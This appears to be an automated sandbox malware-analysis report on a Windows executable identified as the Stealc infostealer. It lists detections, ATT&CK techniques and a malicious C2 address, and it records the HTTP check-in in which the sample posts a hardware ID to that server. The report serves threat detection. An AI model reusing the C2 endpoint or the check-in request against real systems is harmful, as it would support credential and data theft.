Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B89860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B89750 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B878E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 1212, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B89600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: file.exe, file.exe, 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: %*Program Manager
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B87B90 GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B87980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B87850 GetProcessHeap,RtlAllocateHeap,GetUserNameA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B87A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA

Stealing of Sensitive Information

Source: Yara match | File source: 0.2.file.exe.b70000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1485394788.000000000091E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1445038311.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 1212, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

Remote Access Functionality

Source: Yara match | File source: 0.2.file.exe.b70000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1485394788.000000000091E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1445038311.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 1212, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
MITRE ATT&CK matrix (a number before a technique is the count of matched signatures mapped to it):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 11 Native API | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 33 Virtualization/Sandbox Evasion | LSASS Memory | 641 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Disable or Modify Tools | Security Account Manager | 33 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 13 Process Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Account Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 3 Obfuscated Files or Information | Cached Domain Credentials | 1 System Owner/User Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Software Packing | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 324 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Source | Detection | Scanner | Label | Link
file.exe | 42% | ReversingLabs | Win32.Trojan.Generic |
file.exe | 100% | Avira | TR/Crypt.TPM.Gen |
file.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
Source | Detection | Scanner | Label | Link
http://185.215.113.37/ | 100% | URL Reputation | malware |
http://185.215.113.37 | 100% | URL Reputation | malware |
http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware |
                No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/ | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/e2b1563c6670f193.phpN | file.exe, 00000000.00000002.1485394788.000000000097A000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37o | file.exe, 00000000.00000002.1485394788.000000000097A000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.phpB | file.exe, 00000000.00000002.1485394788.000000000097A000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e | file.exe, 00000000.00000002.1485394788.000000000097A000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37 | file.exe, 00000000.00000002.1485394788.000000000091E000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.phpv | file.exe, 00000000.00000002.1485394788.000000000097A000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37( | file.exe, 00000000.00000002.1485394788.000000000091E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.phpZ | file.exe, 00000000.00000002.1485394788.000000000097A000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
185.215.113.37 | unknown | Portugal | | 206894 | WHOLESALECONNECTIONSNL | true
                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1524978
                              Start date and time:2024-10-03 14:47:03 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 5m 8s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:8
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:file.exe
                              Detection:MAL
                              Classification:mal100.troj.evad.winEXE@1/0@0/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 80%
                              • Number of executed functions: 19
                              • Number of non-executed functions: 88
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Not all processes where analyzed, report is missing behavior information
                              • VT rate limit hit for: file.exe
                              No simulations
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
185.215.113.37 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
| file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37/e2b1563c6670f193.php
| file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
| file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37/e2b1563c6670f193.php
| file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
| file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
| file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37/e2b1563c6670f193.php
| file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
| file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
| file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37/e2b1563c6670f193.php
                              No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
| file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37
| file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
| file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37
| file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
| file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
| file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37
| file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
| file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
| file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37
                              No context
                              No context
                              No created / dropped files found
                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):7.947124810092633
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.96%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:file.exe
                              File size:1'870'848 bytes
                              MD5:0c648c4dfca774a2f1d5204ac06ac5e0
                              SHA1:0a095f75ca3115203ccee6f839e284ee6bb361d2
                              SHA256:c942c65b0db11adce8f7bded91a98d91e9c236a47cab99ea49d89acdb020c734
                              SHA512:ceadaf5756c9a6dae716bd90e3617867299e9fc066441d1ccd488f632cf2874200457a3444befb863dbb4a90c8029790a2e9cb49b99270675cf765f1814382b8
                              SSDEEP:49152:TC95AamAlPHS4kPYpo+n1EPhpl6xI0SsA:29pRHRkD+Gp87Y
                              TLSH:79853374A9E9A4B2DC9D4D78D8F0871D36A222458EAA1724C518F27E1C3C67DFF2CC49
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
                              Icon Hash:00928e8e8686b000
                              Entrypoint:0xaa8000
                              Entrypoint Section:.taggant
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                              Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:1
                              File Version Major:5
                              File Version Minor:1
                              Subsystem Version Major:5
                              Subsystem Version Minor:1
                              Import Hash:2eabe9054cad5152567f0699947a2c5b
                              Instruction
                              Programming Language:
                              • [C++] VS2010 build 30319
                              • [ASM] VS2010 build 30319
                              • [ C ] VS2010 build 30319
                              • [ C ] VS2008 SP1 build 30729
                              • [IMP] VS2008 SP1 build 30729
                              • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x25b000 | 0x22800 | d6c28ec4e5663db5eda01c271ecc8c68 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x25e000 | 0x2a6000 | 0x200 | 7f730211bf16579e65607a2c2c3d2738 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
vsethdti | 0x504000 | 0x1a3000 | 0x1a2800 | c32e42a715033bef2f5dad4f27cb03b7 | False | 0.9948937565337514 | data | 7.953545786264284 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
ypmwblrh | 0x6a7000 | 0x1000 | 0x600 | dfa8492b9d4c77a21e52d05c1c703126 | False | 0.552734375 | data | 4.866178838614331 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x6a8000 | 0x3000 | 0x2200 | 551408a43224efdf482d0b555b2720e2 | False | 0.07697610294117647 | DOS executable (COM) | 1.0141209618416407 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-03T14:48:04.999687+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.8 | 49704 | 185.215.113.37 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 3, 2024 14:48:03.919291973 CEST | 49704 | 80 | 192.168.2.8 | 185.215.113.37
Oct 3, 2024 14:48:03.953511953 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.8
Oct 3, 2024 14:48:03.953628063 CEST | 49704 | 80 | 192.168.2.8 | 185.215.113.37
Oct 3, 2024 14:48:03.953809977 CEST | 49704 | 80 | 192.168.2.8 | 185.215.113.37
Oct 3, 2024 14:48:04.002850056 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.8
Oct 3, 2024 14:48:04.748445034 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.8
Oct 3, 2024 14:48:04.748589993 CEST | 49704 | 80 | 192.168.2.8 | 185.215.113.37
Oct 3, 2024 14:48:04.751244068 CEST | 49704 | 80 | 192.168.2.8 | 185.215.113.37
Oct 3, 2024 14:48:04.757786036 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.8
Oct 3, 2024 14:48:04.999599934 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.8
Oct 3, 2024 14:48:04.999686956 CEST | 49704 | 80 | 192.168.2.8 | 185.215.113.37
Oct 3, 2024 14:48:07.249784946 CEST | 49704 | 80 | 192.168.2.8 | 185.215.113.37
                              • 185.215.113.37
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49704 | 185.215.113.37 | 80 | 1212 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 14:48:03.953809977 CEST | 89 | OUT | GET / HTTP/1.1
Host: 185.215.113.37
Connection: Keep-Alive
Cache-Control: no-cache
Oct 3, 2024 14:48:04.748445034 CEST | 203 | IN | HTTP/1.1 200 OK
Date: Thu, 03 Oct 2024 12:48:04 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Oct 3, 2024 14:48:04.751244068 CEST | 412 | OUT | POST /e2b1563c6670f193.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----AKFIDHDGIEGCAKFIIJKF
Host: 185.215.113.37
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 38 38 37 41 32 37 32 31 42 39 35 31 31 31 37 33 38 38 33 36 35 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 46 2d 2d 0d 0a
Data Ascii: ------AKFIDHDGIEGCAKFIIJKFContent-Disposition: form-data; name="hwid"3887A2721B951117388365------AKFIDHDGIEGCAKFIIJKFContent-Disposition: form-data; name="build"doma------AKFIDHDGIEGCAKFIIJKF--
Oct 3, 2024 14:48:04.999599934 CEST | 210 | IN | HTTP/1.1 200 OK
Date: Thu, 03 Oct 2024 12:48:04 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 59 6d 78 76 59 32 73 3d
Data Ascii: YmxvY2s=



                              Target ID:0
                              Start time:08:48:00
                              Start date:03/10/2024
                              Path:C:\Users\user\Desktop\file.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\file.exe"
                              Imagebase:0xb70000
                              File size:1'870'848 bytes
                              MD5 hash:0C648C4DFCA774A2F1D5204AC06AC5E0
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1485394788.000000000091E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1445038311.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:true


                                Execution Graph

                                Execution Coverage:7.6%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:10.1%
                                Total number of Nodes:2000
                                Total number of Limit Nodes:24
14107 b86443 14106->14107 14108 b8a8a0 lstrcpy 14107->14108 14109 b86455 14108->14109 14110 b8a8a0 lstrcpy 14109->14110 14111 b86467 14110->14111 14112 b8a8a0 lstrcpy 14111->14112 14113 b85b86 14112->14113 14113->13877 14115 b745c0 2 API calls 14114->14115 14116 b726b4 14115->14116 14117 b745c0 2 API calls 14116->14117 14118 b726d7 14117->14118 14119 b745c0 2 API calls 14118->14119 14120 b726f0 14119->14120 14121 b745c0 2 API calls 14120->14121 14122 b72709 14121->14122 14123 b745c0 2 API calls 14122->14123 14124 b72736 14123->14124 14125 b745c0 2 API calls 14124->14125 14126 b7274f 14125->14126 14127 b745c0 2 API calls 14126->14127 14128 b72768 14127->14128 14129 b745c0 2 API calls 14128->14129 14130 b72795 14129->14130 14131 b745c0 2 API calls 14130->14131 14132 b727ae 14131->14132 14133 b745c0 2 API calls 14132->14133 14134 b727c7 14133->14134 14135 b745c0 2 API calls 14134->14135 14136 b727e0 14135->14136 14137 b745c0 2 API calls 14136->14137 14138 b727f9 14137->14138 14139 b745c0 2 API calls 14138->14139 14140 b72812 14139->14140 14141 b745c0 2 API calls 14140->14141 14142 b7282b 14141->14142 14143 b745c0 2 API calls 14142->14143 14144 b72844 14143->14144 14145 b745c0 2 API calls 14144->14145 14146 b7285d 14145->14146 14147 b745c0 2 API calls 14146->14147 14148 b72876 14147->14148 14149 b745c0 2 API calls 14148->14149 14150 b7288f 14149->14150 14151 b745c0 2 API calls 14150->14151 14152 b728a8 14151->14152 14153 b745c0 2 API calls 14152->14153 14154 b728c1 14153->14154 14155 b745c0 2 API calls 14154->14155 14156 b728da 14155->14156 14157 b745c0 2 API calls 14156->14157 14158 b728f3 14157->14158 14159 b745c0 2 API calls 14158->14159 14160 b7290c 14159->14160 14161 b745c0 2 API calls 14160->14161 14162 b72925 14161->14162 14163 b745c0 2 API calls 14162->14163 14164 b7293e 14163->14164 14165 b745c0 2 API calls 14164->14165 14166 b72957 14165->14166 14167 b745c0 2 API calls 14166->14167 14168 b72970 14167->14168 14169 b745c0 2 API calls 14168->14169 14170 b72989 
14169->14170 14171 b745c0 2 API calls 14170->14171 14172 b729a2 14171->14172 14173 b745c0 2 API calls 14172->14173 14174 b729bb 14173->14174 14175 b745c0 2 API calls 14174->14175 14176 b729d4 14175->14176 14177 b745c0 2 API calls 14176->14177 14178 b729ed 14177->14178 14179 b745c0 2 API calls 14178->14179 14180 b72a06 14179->14180 14181 b745c0 2 API calls 14180->14181 14182 b72a1f 14181->14182 14183 b745c0 2 API calls 14182->14183 14184 b72a38 14183->14184 14185 b745c0 2 API calls 14184->14185 14186 b72a51 14185->14186 14187 b745c0 2 API calls 14186->14187 14188 b72a6a 14187->14188 14189 b745c0 2 API calls 14188->14189 14190 b72a83 14189->14190 14191 b745c0 2 API calls 14190->14191 14192 b72a9c 14191->14192 14193 b745c0 2 API calls 14192->14193 14194 b72ab5 14193->14194 14195 b745c0 2 API calls 14194->14195 14196 b72ace 14195->14196 14197 b745c0 2 API calls 14196->14197 14198 b72ae7 14197->14198 14199 b745c0 2 API calls 14198->14199 14200 b72b00 14199->14200 14201 b745c0 2 API calls 14200->14201 14202 b72b19 14201->14202 14203 b745c0 2 API calls 14202->14203 14204 b72b32 14203->14204 14205 b745c0 2 API calls 14204->14205 14206 b72b4b 14205->14206 14207 b745c0 2 API calls 14206->14207 14208 b72b64 14207->14208 14209 b745c0 2 API calls 14208->14209 14210 b72b7d 14209->14210 14211 b745c0 2 API calls 14210->14211 14212 b72b96 14211->14212 14213 b745c0 2 API calls 14212->14213 14214 b72baf 14213->14214 14215 b745c0 2 API calls 14214->14215 14216 b72bc8 14215->14216 14217 b745c0 2 API calls 14216->14217 14218 b72be1 14217->14218 14219 b745c0 2 API calls 14218->14219 14220 b72bfa 14219->14220 14221 b745c0 2 API calls 14220->14221 14222 b72c13 14221->14222 14223 b745c0 2 API calls 14222->14223 14224 b72c2c 14223->14224 14225 b745c0 2 API calls 14224->14225 14226 b72c45 14225->14226 14227 b745c0 2 API calls 14226->14227 14228 b72c5e 14227->14228 14229 b745c0 2 API calls 14228->14229 14230 b72c77 14229->14230 14231 b745c0 2 API calls 14230->14231 14232 b72c90 14231->14232 
14233 b745c0 2 API calls 14232->14233 14234 b72ca9 14233->14234 14235 b745c0 2 API calls 14234->14235 14236 b72cc2 14235->14236 14237 b745c0 2 API calls 14236->14237 14238 b72cdb 14237->14238 14239 b745c0 2 API calls 14238->14239 14240 b72cf4 14239->14240 14241 b745c0 2 API calls 14240->14241 14242 b72d0d 14241->14242 14243 b745c0 2 API calls 14242->14243 14244 b72d26 14243->14244 14245 b745c0 2 API calls 14244->14245 14246 b72d3f 14245->14246 14247 b745c0 2 API calls 14246->14247 14248 b72d58 14247->14248 14249 b745c0 2 API calls 14248->14249 14250 b72d71 14249->14250 14251 b745c0 2 API calls 14250->14251 14252 b72d8a 14251->14252 14253 b745c0 2 API calls 14252->14253 14254 b72da3 14253->14254 14255 b745c0 2 API calls 14254->14255 14256 b72dbc 14255->14256 14257 b745c0 2 API calls 14256->14257 14258 b72dd5 14257->14258 14259 b745c0 2 API calls 14258->14259 14260 b72dee 14259->14260 14261 b745c0 2 API calls 14260->14261 14262 b72e07 14261->14262 14263 b745c0 2 API calls 14262->14263 14264 b72e20 14263->14264 14265 b745c0 2 API calls 14264->14265 14266 b72e39 14265->14266 14267 b745c0 2 API calls 14266->14267 14268 b72e52 14267->14268 14269 b745c0 2 API calls 14268->14269 14270 b72e6b 14269->14270 14271 b745c0 2 API calls 14270->14271 14272 b72e84 14271->14272 14273 b745c0 2 API calls 14272->14273 14274 b72e9d 14273->14274 14275 b745c0 2 API calls 14274->14275 14276 b72eb6 14275->14276 14277 b745c0 2 API calls 14276->14277 14278 b72ecf 14277->14278 14279 b745c0 2 API calls 14278->14279 14280 b72ee8 14279->14280 14281 b745c0 2 API calls 14280->14281 14282 b72f01 14281->14282 14283 b745c0 2 API calls 14282->14283 14284 b72f1a 14283->14284 14285 b745c0 2 API calls 14284->14285 14286 b72f33 14285->14286 14287 b745c0 2 API calls 14286->14287 14288 b72f4c 14287->14288 14289 b745c0 2 API calls 14288->14289 14290 b72f65 14289->14290 14291 b745c0 2 API calls 14290->14291 14292 b72f7e 14291->14292 14293 b745c0 2 API calls 14292->14293 14294 b72f97 14293->14294 14295 b745c0 2 
API calls 14294->14295 14296 b72fb0 14295->14296 14297 b745c0 2 API calls 14296->14297 14298 b72fc9 14297->14298 14299 b745c0 2 API calls 14298->14299 14300 b72fe2 14299->14300 14301 b745c0 2 API calls 14300->14301 14302 b72ffb 14301->14302 14303 b745c0 2 API calls 14302->14303 14304 b73014 14303->14304 14305 b745c0 2 API calls 14304->14305 14306 b7302d 14305->14306 14307 b745c0 2 API calls 14306->14307 14308 b73046 14307->14308 14309 b745c0 2 API calls 14308->14309 14310 b7305f 14309->14310 14311 b745c0 2 API calls 14310->14311 14312 b73078 14311->14312 14313 b745c0 2 API calls 14312->14313 14314 b73091 14313->14314 14315 b745c0 2 API calls 14314->14315 14316 b730aa 14315->14316 14317 b745c0 2 API calls 14316->14317 14318 b730c3 14317->14318 14319 b745c0 2 API calls 14318->14319 14320 b730dc 14319->14320 14321 b745c0 2 API calls 14320->14321 14322 b730f5 14321->14322 14323 b745c0 2 API calls 14322->14323 14324 b7310e 14323->14324 14325 b745c0 2 API calls 14324->14325 14326 b73127 14325->14326 14327 b745c0 2 API calls 14326->14327 14328 b73140 14327->14328 14329 b745c0 2 API calls 14328->14329 14330 b73159 14329->14330 14331 b745c0 2 API calls 14330->14331 14332 b73172 14331->14332 14333 b745c0 2 API calls 14332->14333 14334 